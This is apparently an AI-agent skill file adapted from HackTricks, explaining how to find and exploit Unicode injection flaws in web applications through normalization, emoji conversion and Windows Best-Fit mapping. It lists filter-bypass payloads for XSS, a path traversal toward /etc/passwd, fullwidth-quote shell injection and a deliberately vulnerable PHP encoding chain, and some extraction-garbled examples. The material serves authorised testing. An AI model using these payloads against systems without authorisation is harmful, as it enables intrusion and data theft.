Hacktricks-skills unicode-injection-pentest
How to find and exploit Unicode injection vulnerabilities in web applications. Use this skill whenever you're testing for XSS, SQLi, or other injection vulnerabilities and want to try Unicode-based bypass techniques. Trigger this when you encounter input validation, WAF filters, or encoding issues that might be vulnerable to Unicode normalization attacks, emoji injection, or Windows Best-Fit character mapping exploits.
git clone https://github.com/abelrguezr/hacktricks-skills
skills/pentesting-web/unicode-injection/unicode-injection/SKILL.MDUnicode Injection Pentesting
A skill for discovering and exploiting Unicode injection vulnerabilities in web applications.
Overview
Unicode injection vulnerabilities occur when back-end or front-end systems behave unexpectedly when receiving unusual Unicode characters. Attackers can bypass protections and inject arbitrary characters to exploit injection vulnerabilities like XSS or SQLi.
Attack Vectors
1. Unicode Normalization Attacks
When it happens: Systems modify user input after validation (e.g., converting to uppercase/lowercase).
How it works: Unicode characters normalize to ASCII during transformation, generating new characters that bypass filters.
Example:
Input: 㱋 (\u3c4b) After normalization: <4b Result: < character injected
Testing approach:
- Identify input fields with case conversion or normalization
- Send Unicode characters that normalize to dangerous ASCII
- Check if the normalized output bypasses filters
2. \u to % Conversion Attacks
When it happens: Backend transforms
\u prefix to % (URL encoding style).
How it works:
\u3c4b becomes %3c4b, which URL-decodes to <4b, injecting <.
Testing approach:
- Find Unicode characters with
representation\u - Send them to the application
- Check if the backend converts
to\u% - Verify if URL decoding creates injection characters
Useful resources:
- Unicode Explorer - Find character codes
- Unicode Injection Research - Deep dive
3. Emoji Injection Attacks
When it happens: Backends mishandle emoji encoding conversions.
How it works: Encoding mismatches (e.g., Windows-1252 to UTF-8 to ASCII) can normalize emoji to dangerous characters.
Example payload:
💋img src=x onerror=alert(document.domain)//💛
Vulnerable pattern:
$str = htmlspecialchars($_GET["str"]); $str = iconv("Windows-1252", "UTF-8", $str); $str = iconv("UTF-8", "ASCII//TRANSLIT", $str);
Testing approach:
- Send emoji payloads with embedded injection code
- Check for encoding conversion chains
- Look for normalization to ASCII characters
Emoji lists:
4. Windows Best-Fit/Worst-Fit Attacks
When it happens: Windows applications use "W" (wide) APIs but call "A" (ANSI) APIs, triggering Best-Fit conversion.
How it works: Windows replaces Unicode characters that can't display in ASCII with similar ASCII characters.
Common mappings:
- Characters mapped to
(0x2F) - path traversal/ - Characters mapped to
(0x5C) - path traversal\ - Fullwidth double quotes (U+FF02) - argument injection
Example:
Input: " (fullwidth double quote U+FF02) After Best-Fit: " (ASCII double quote) Result: Shell argument splitting
Testing approach:
- Check if target uses Windows with W→A API conversion
- Use worst.fit mapping to find character mappings
- Send Unicode characters that map to dangerous ASCII
- Test blacklist bypasses, path traversal, shell escape bypasses
Testing Workflow
Step 1: Reconnaissance
- Identify input vectors: Forms, URL parameters, headers, file uploads
- Check for encoding: Look for iconv, htmlspecialchars, case conversion
- Determine platform: Windows vs Linux (affects Best-Fit applicability)
- Map the data flow: Where does input go? What transformations occur?
Step 2: Initial Testing
- Send basic Unicode: Test with common Unicode characters
- Check normalization: Look for case conversion or encoding changes
- Test emoji: Send emoji payloads with embedded code
- Try \u sequences: Send Unicode escape sequences
Step 3: Advanced Testing
- Use worst.fit mappings: Find characters that map to dangerous ASCII
- Test encoding chains: Multiple conversions can create vulnerabilities
- Bypass blacklists: Use Unicode equivalents of blocked characters
- Path traversal: Map characters to
and/\ - Shell injection: Use fullwidth quotes for argument splitting
Step 4: Verification
- Check output: Does the injection work?
- Review logs: What did the backend receive?
- Test impact: Can you execute code, read files, etc.?
- Document findings: Save payloads and results
Common Payloads
XSS via Unicode
\u3c4b<script>alert(1)</script>\u3e4b 💋<img src=x onerror=alert(1)>💛
Path Traversal via Best-Fit
/\u2215..\u2215etc\u2215passwd # Characters mapping to /
Shell Injection via Fullwidth Quotes
"\uff02ls\uff02 # Fullwidth quotes that become ASCII quotes
Tools and Resources
- Unicode Explorer - Character lookup
- worst.fit - Windows Best-Fit mappings
- Unicode Emoji Charts - Emoji reference
Important Notes
- Windows Best-Fit requires W→A API conversion: Not all Windows apps are vulnerable
- Encoding matters: UTF-8, Windows-1252, ASCII conversions create different behaviors
- Some vulnerabilities won't be fixed: Best-Fit is a Windows feature, not a bug
- Test in context: What works depends on the specific application and platform
When to Use This Skill
- Testing input validation and WAF bypasses
- Investigating XSS or SQLi that seems filtered
- Analyzing encoding-related issues
- Pentesting Windows-based web applications
- Reviewing applications with Unicode handling
- When standard injection payloads are blocked
Safety and Ethics
- Only test systems you have authorization to test
- Document all findings for remediation
- Unicode injection can have unintended side effects
- Some exploits may cause application crashes or data corruption